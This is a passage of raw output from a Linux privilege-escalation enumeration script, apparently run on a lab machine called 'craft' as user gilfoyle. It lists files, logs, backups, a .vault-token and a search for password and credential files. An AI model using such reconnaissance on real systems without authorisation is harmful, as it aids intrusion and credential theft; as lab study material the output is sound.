/usr/lib/vmware-tools/plugins64/vmusr/[Link]
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/vmware-xferlogs
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/[Link]
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/appLoader-av0
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/appLoader
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin32/vmware-xferlogs
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
2020-11-05+[Link].0102455520 /usr/lib/vmware-tools/bin32/[Link]
2020-11-05+[Link].0102455520 /usr/lib/vmware-tools/bin32/appLoader-av0
2020-11-05+[Link].0102455520 /usr/lib/vmware-tools/bin32/appLoader
2020-11-05+[Link].5142465480 /usr/lib/vmware-tools/sbin32/vmware-rpctool
2020-11-05+[Link].5142465480 /usr/lib/vmware-tools/sbin32/vmware-hgfsmounter
2020-11-05+[Link].5142465480 /usr/lib/vmware-tools/sbin32/vmware-checkvm
2020-11-05+[Link].4622507320 /etc/init.d/vmware-tools
2020-11-05+[Link].1702577160 /usr/bin/[Link]
2020-11-05+[Link].1702577160 /usr/bin/vm-support
2020-11-05+[Link].1662577250 /usr/bin/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/scripts/vmware/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]

╔══════════╣ Unexpected in /opt (usually empty)

total 20
drwxr-xr-x 5 root root 4096 Feb 9 2019 .
drwxr-xr-x 22 root root 4096 Nov 16 2023 ..
drwx------ 3 root root 4096 Jun 16 2021 admin
drwx--x--x 4 root root 4096 Feb 2 2019 containerd
drwx------ 8 root root 4096 Feb 8 2019 storage

╔══════════╣ Unexpected in root

/[Link]
/[Link]
/[Link]
/vmlinuz

╔══════════╣ Modified interesting files in the last 5mins (limit 100)

/etc/hosts
/etc/[Link]
/home/gilfoyle/.gnupg/[Link]
/home/gilfoyle/.gnupg/[Link]
/var/log/[Link]
/var/log/syslog
/var/log/[Link]
/usr/local/etc/[Link]

logrotate 3.11.0
╔══════════╣ Syslog configuration (limit 50)

module(load="imuxsock") # provides support for local system logging

module(load="imklog") # provides kernel logging support

$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat

$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022

$WorkDirectory /var/spool/rsyslog
$IncludeConfig /etc/rsyslog.d/*.conf

auth,authpriv.* /var/log/[Link]
*.*;auth,[Link] -/var/log/syslog
daemon.* -/var/log/[Link]
kern.* -/var/log/[Link]
lpr.* -/var/log/[Link]
mail.* -/var/log/[Link]
user.* -/var/log/[Link]

[Link] -/var/log/[Link]
[Link] -/var/log/[Link]
[Link] /var/log/[Link]

*.=debug;\
auth,[Link];\
[Link];[Link] -/var/log/debug
*.=info;*.=notice;*.=warn;\
auth,[Link];\
cron,[Link];\
mail,[Link] -/var/log/messages

*.emerg :omusrmsg:*
╔══════════╣ Auditd configuration (limit 50)
auditd configuration Not Found
╔══════════╣ Log files with potentially weak perms (limit 50)
524318 268 -rw-r----- 1 root adm 274355 Jan 27 2021
/var/log/[Link]
535368 100 -rw-r----- 1 root adm 101846 Nov 30 05:13
/var/log/debug.1
524449 0 -rw-r--r-- 1 root adm 0 Jan 27 2021
/var/log/unattended-upgrades/[Link]
535630 4 -rw-r--r-- 1 root adm 3318 Jan 26 2021
/var/log/unattended-upgrades/[Link]
534346 4 -rw-r----- 1 root adm 2084 Nov 30 05:13
/var/log/[Link].1
534303 4 -rw-r----- 1 root adm 715 Jan 31 2021
/var/log/[Link]
526417 8 -rw-r----- 1 root adm 5752 Nov 30 08:15
/var/log/[Link]
534304 4 -rw-r----- 1 root adm 211 Jan 29 2021
/var/log/[Link]
526405 144 -rw-r----- 1 root adm 143563 Jun 17 2021
/var/log/[Link]
524501 20 -rw-r----- 1 root adm 19257 Jun 17 2021
/var/log/[Link]
524432 4 -rw-r----- 1 root adm 334 Jan 31 2021
/var/log/[Link]
524523 20 -rw-r----- 1 root adm 17771 Jan 28 2021
/var/log/[Link]
526428 0 -rw-r----- 1 root adm 0 Nov 30 06:25
/var/log/[Link]
526465 4 -rw-r----- 1 root adm 437 Nov 30 07:59
/var/log/messages
535370 540 -rw-r----- 1 root adm 545343 Nov 30 06:25
/var/log/messages.1
524448 204 -rw-r----- 1 root adm 207212 Jan 27 2021
/var/log/[Link]
534307 4 -rw-r----- 1 root adm 188 Jan 26 2021
/var/log/[Link]
534312 20 -rw-r----- 1 root adm 17795 Jan 31 2021
/var/log/[Link]
524346 20 -rw-r----- 1 root adm 17663 Jan 29 2021
/var/log/[Link]
534343 252 -rw-r----- 1 root adm 249947 Nov 30 06:25
/var/log/[Link].1
526413 72 -rw-r----- 1 root adm 72747 Jun 17 2021
/var/log/[Link]
526412 28 -rw-r----- 1 root adm 26010 Jun 17 2021
/var/log/[Link]
526411 4 -rw-r----- 1 root adm 144 Jun 17 2021
/var/log/[Link]
536677 72 -rw-r----- 1 root adm 72809 Jan 27 2021
/var/log/[Link]
534305 64 -rw-r----- 1 root adm 62026 Jan 31 2021
/var/log/[Link]
526418 4 -rw-r----- 1 root adm 284 Nov 30 07:59
/var/log/[Link]
534308 72 -rw-r----- 1 root adm 71645 Jan 26 2021
/var/log/[Link]
524317 28 -rw-r----- 1 root adm 23648 Nov 30 08:15
/var/log/syslog
526423 32 -rw-r----- 1 root adm 25682 Nov 30 08:15
/var/log/[Link]
534309 156 -rw-r----- 1 root adm 154691 Nov 30 06:09
/var/log/[Link].1
524349 20 -rw-r----- 1 root adm 17795 Jan 30 2021
/var/log/[Link]
534311 632 -rw-r----- 1 root adm 644237 Nov 30 05:14
/var/log/[Link].1
526460 0 -rw-r----- 1 root adm 0 Nov 30 06:25
/var/log/debug
525243 8 -rw-r----- 1 root adm 5095 Nov 16 2023
/var/log/apt/[Link]
525049 0 -rw-r----- 1 root adm 0 Nov 30 06:25
/var/log/apt/[Link]
530259 8 -rw-r----- 1 root adm 4226 Jan 26 2021
/var/log/apt/[Link]
534300 20 -rw-r----- 1 root adm 17668 Feb 1 2021
/var/log/[Link]
534301 980 -rw-r----- 1 root adm 998748 Nov 30 06:25
/var/log/syslog.1
524384 16 -rw-r----- 1 root adm 15408 Jan 27 2021
/var/log/[Link]
524446 100 -rw-r----- 1 root adm 98931 Jun 17 2021
/var/log/[Link]
526407 32 -rw-r----- 1 root adm 32442 Jun 17 2021
/var/log/[Link]

╔══════════╣ Files inside /home/gilfoyle (limit 20)

total 992
drwx------ 5 gilfoyle gilfoyle 4096 Nov 30 08:14 .
drwxr-xr-x 3 root root 4096 Feb 9 2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb 9 2019 .config
drwx------ 3 gilfoyle gilfoyle 4096 Nov 30 08:14 .gnupg
-rwxr-xr-x 1 gilfoyle gilfoyle 971926 Nov 15 10:04 [Link]
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb 9 2019 .ssh
-r-------- 1 gilfoyle gilfoyle 33 Nov 30 05:13 [Link]
-rw------- 1 gilfoyle gilfoyle 36 Feb 9 2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 2546 Feb 9 2019 .viminfo

╔══════════╣ Files inside others home (limit 20)

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders

drwxr-xr-x 2 root root 4096 Nov 30 06:25 /var/backups
total 1252
-rw-r--r-- 1 root root 40960 Nov 30 06:25 [Link].0
-rw-r--r-- 1 root root 1797 Jan 27 2021 [Link]
-rw-r--r-- 1 root root 2288 Feb 3 2019 [Link]
-rw-r--r-- 1 root root 12545 Nov 16 2023 apt.extended_states.0
-rw-r--r-- 1 root root 1402 Nov 5 2020 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1347 Feb 9 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1472 Feb 9 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1620 Feb 9 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1686 Feb 6 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1586 Feb 2 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 362 Feb 9 2019 [Link].0
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 100 Nov 22 2018 [Link].0
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 403144 Nov 16 2023 [Link].0
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw------- 1 root root 666 Feb 9 2019 [Link]
-rw------- 1 root shadow 557 Feb 9 2019 [Link]
-rw------- 1 root root 1379 Feb 9 2019 [Link]
-rw------- 1 root shadow 934 Feb 10 2019 [Link]

╔══════════╣ Backup files (limited 100)

-rw-r--r-- 1 root root 4096 Nov 30 08:14
/sys/devices/virtual/net/veth5687e2b/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14
/sys/devices/virtual/net/veth7e1df0c/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14
/sys/devices/virtual/net/vethe4fc99f/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14
/sys/devices/virtual/net/veth7e96868/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14
/sys/devices/virtual/net/vethdc12f9f/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14
/sys/devices/virtual/net/vethaf27d62/brport/backup_port
-rw-r--r-- 1 root root 610 Nov 22 2018 /etc/xml/[Link]
-rw-r--r-- 1 root root 673 Nov 22 2018 /etc/xml/[Link]
-rw-r--r-- 1 root root 20 Apr 5 2019 /etc/vmware-tools/[Link]
-rw-r--r-- 1 root root 128 Nov 22 2018 /var/lib/sgml-base/[Link]
-rw-r--r-- 1 root root 303 May 15 2018 /usr/share/doc/hdparm/[Link]
-rw-r--r-- 1 root root 31664 Apr 5 2019
/usr/lib/open-vm-tools/plugins/vmsvc/[Link]
-rwxr-xr-x 1 root root 34632 Nov 5 2020
/usr/lib/vmware-tools/plugins64/vmsvc/[Link]
-rwxr-xr-x 1 root root 29888 Nov 5 2020
/usr/lib/vmware-tools/plugins32/vmsvc/[Link]
-rw-r--r-- 1 root root 14051 Sep 7 2023
/lib/modules/6.1.0-12-amd64/kernel/drivers/net/team/team_mode_activebackup.ko

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)

Found /var/lib/apt/[Link]
Found /var/lib/apt/[Link]
Found /var/lib/PackageKit/[Link]

-> Extracting tables from /var/lib/PackageKit/[Link] (limit 20)

╔══════════╣ Web files?(output limit)

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the
previous check) (limit 70)
-rw-r--r-- 1 root root 0 Nov 30 05:13 /run/network/.[Link]
-rw-r--r-- 1 root root 220 May 15 2017 /etc/skel/.bash_logout
-rw------- 1 root root 0 Nov 22 2018 /etc/.[Link]

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp,

/private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 40960 Nov 30 06:25 /var/backups/[Link].0
-rw-r--r-- 1 root root 2288 Feb 3 2019 /var/backups/[Link]
-rw-r--r-- 1 root root 1797 Jan 27 2021 /var/backups/[Link]

╔══════════╣ Searching *password* or *credential* files in home (limit 70)

/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/[Link]
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python2.7/dist-packages/keyring/[Link]
/usr/lib/python2.7/dist-packages/keyring/[Link]
/usr/lib/python3/dist-packages/keyring/[Link]
/usr/lib/python3/dist-packages/keyring/__pycache__/[Link]
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/[Link]
/usr/share/man/man1/[Link]
/usr/share/man/man1/[Link]
/usr/share/man/man1/[Link]
#)There are more creds/passwds files in the previous parent folder

/usr/share/man/man8/[Link]
/usr/share/man/man8/[Link]
/usr/share/man/man8/[Link]
/usr/share/man/man8/[Link]
#)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/[Link]
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)

/var/log/[Link].1:2023-11-16 [Link] configure passwd:amd64 1:4.4-4.1+deb9u1
<none>
/var/log/[Link].1:2023-11-16 [Link] status half-configured passwd:amd64 1:4.4-
4.1
/var/log/[Link].1:2023-11-16 [Link] status half-configured passwd:amd64 1:4.4-
4.1+deb9u1
/var/log/[Link].1:2023-11-16 [Link] status half-installed passwd:amd64 1:4.4-
4.1
/var/log/[Link].1:2023-11-16 [Link] status installed passwd:amd64 1:4.4-
4.1+deb9u1
/var/log/[Link].1:2023-11-16 [Link] status unpacked passwd:amd64 1:4.4-4.1
/var/log/[Link].1:2023-11-16 [Link] status unpacked passwd:amd64 1:4.4-
4.1+deb9u1
/var/log/[Link].1:2023-11-16 [Link] upgrade passwd:amd64 1:4.4-4.1 1:4.4-
4.1+deb9u1

╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and

filtering out useless env vars
_=/bin/dd
_=/bin/grep
HOME=/home/gilfoyle
LANG=en_US.UTF-8
_=./[Link]
LOGNAME=gilfoyle
MAIL=/var/mail/gilfoyle
NOTIFY_SOCKET=/run/systemd/notify
PWD=/home/gilfoyle
SHELL=/bin/bash
SHLVL=1
SHLVL=2
SSH_CLIENT=[Link] 60846 22
SSH_CONNECTION=[Link] 60846 [Link] 22
SSH_TTY=/dev/pts/0
TERM=xterm-256color
USER=gilfoyle
_=/usr/bin/xxd
VAULT_ADDR=[Link]
XDG_RUNTIME_DIR=/run/user/1001

╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'

gilfoyle@craft:~$